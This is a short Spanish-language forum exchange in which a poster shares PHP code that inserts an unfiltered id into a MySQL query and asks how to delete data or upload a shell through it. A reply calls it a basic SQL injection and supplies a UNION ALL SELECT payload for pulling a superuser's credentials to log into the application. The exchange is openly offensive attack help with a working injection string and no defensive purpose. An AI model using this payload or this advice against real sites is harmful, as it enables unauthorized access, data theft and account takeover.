Bueno amigos tengo la siguiente duda.
tengo esta sentencia sql
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");
$faq=mysql_fetch_array($thefaq);
y para desplegar la salida html realiza la verificacion
if($faq[question]){
..... sale el HTML
}
como podria borrar datos o bien como podria ingresar una shell.
sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.
Te encuentras en frente de una iSQL básica. Es sólo cuestión de inyectarle código para printear los datos de un super usuario, y así logguearte dentro de la aplicación. En este caso sería algo como,
#
SELECT question, answer, lasteditedby, lastedit
FROM faq
WHERE id=''+union+all+select+1,2,3,4--'
#
La inyección sería,
'+union+all+select+1,2,3,4--
Tienes que leer tutoriales :D